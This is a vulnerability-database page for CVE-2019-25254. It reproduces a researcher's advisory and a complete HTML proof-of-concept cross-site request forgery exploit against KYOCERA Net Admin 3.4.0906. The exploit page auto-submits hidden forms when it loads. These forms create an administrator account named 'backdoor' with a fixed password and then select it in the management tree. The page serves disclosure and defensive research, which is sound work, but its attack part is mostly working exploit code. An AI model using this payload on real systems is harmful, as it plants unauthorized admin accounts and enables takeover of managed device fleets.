| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| KYOCERA Net Admin 安全漏洞 | 24 Dec 202500:00 | – | cnnvd | |
| CVE-2019-25254 | 24 Dec 202519:28 | – | cve | |
| CVE-2019-25254 KYOCERA Net Admin 3.4.0906 Cross-Site Request Forgery via User Administration | 24 Dec 202519:28 | – | cvelist | |
| EUVD-2025-205300 | 24 Dec 202521:30 | – | euvd | |
| CVE-2019-25254 | 24 Dec 202520:15 | – | nvd | |
| PT-2025-53340 | 24 Dec 202500:00 | – | ptsecurity | |
| CVE-2019-25254 | 25 Dec 202520:18 | – | redhatcve | |
| CVE-2019-25254 KYOCERA Net Admin 3.4.0906 Cross-Site Request Forgery via User Administration | 24 Dec 202519:28 | – | vulnrichment |
<!--
KYOCERA Net Admin 3.4 CSRF Add Admin Exploit
Vendor: KYOCERA Corporation
Product https://global.kyocera.com
Affected version: 3.4.0906
Summary: KYOCERA Net Admin is Kyocera's unified
device management software that uses a web-based
platform to give network administrators easy and
uncomplicated control to handle a fleet for up to
10,000 devices. Tasks that used to require multiple
programs or walking to each printer can now be
accomplished in a single, fast and modern environment.
Desc: The application interface allows users to perform
certain actions via HTTP requests without performing
any validity checks to verify the requests. This can
be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web
site.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Apache Tomcat/8.5.15
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5458
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5458.php
28.03.2018
--><html>
<head>
<title>KYOCERA Net Admin 3.4 CSRF Add Admin Exploit</title>
</head>
<body onload="exploitrun();">
<!-- Add Administrator -->
<form action="https://192.168.18.133:7443/fwk-web/jsp/addUser.faces" method="POST" name="create_user" target="frame0">
<input name="userType" type="hidden" value="0"/>
<input name="addUserForm:loginName" type="hidden" value="backdoor"/>
<input name="addUserForm:pw" type="hidden" value="pass123"/>
<input name="addUserForm:pwConfirm" type="hidden" value="pass123"/>
<input name="addUserForm:role" type="hidden" value="administrator"/>
<input name="addUserForm:required_name" type="hidden" value="name"/>
<input name="addUserForm:required_email1" type="hidden" value="[email protected]"/>
<input name="addUserForm:required_role" type="hidden" value="administrator"/>
<input name="addUserForm:optional_name" type="hidden" value="Backdoor"/>
<input name="addUserForm:company" type="hidden" value="ZSL"/>
<input name="addUserForm:department" type="hidden" value="forensics"/>
<input name="addUserForm:email2" type="hidden" value="[email protected]"/>
<input name="addUserForm:optional_phone" type="hidden" value="123-123-1234"/>
<input name="addUserForm:optional_cell" type="hidden" value="321-321-3210"/>
<input name="addUserForm:submitHidden" type="hidden" value="true"/>
<input name="addUserForm_SUBMIT" type="hidden" value="1"/>
<input name="addUserForm:_link_hidden_" type="hidden" value=""/>
</form>
<!-- Update Node -->
<form action="https://192.168.18.133:7443/fwk-web/servlet/EventControllerServlet" method="GET" name="update_node" target="frame1">
<input name="bname" type="hidden" value=""/>
<input name="ts" type="hidden" value="1522690965730"/>
<input name="cmd" type="hidden" value="tv_set_cur_node"/>
<input name="node_id" type="hidden" value="root.user_administration.administrator.backdoor"/>
</form>
<iframe name="frame0"></iframe>
<iframe name="frame1"></iframe>
<script>
function exploitrun()
{
document.create_user.submit();
document.getElementsByTagName("iframe")[0].onload = function()
{
document.update_node.submit();
document.getElementsByTagName("iframe")[1].onload = function()
}
}
</script>
</body>
</html>
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation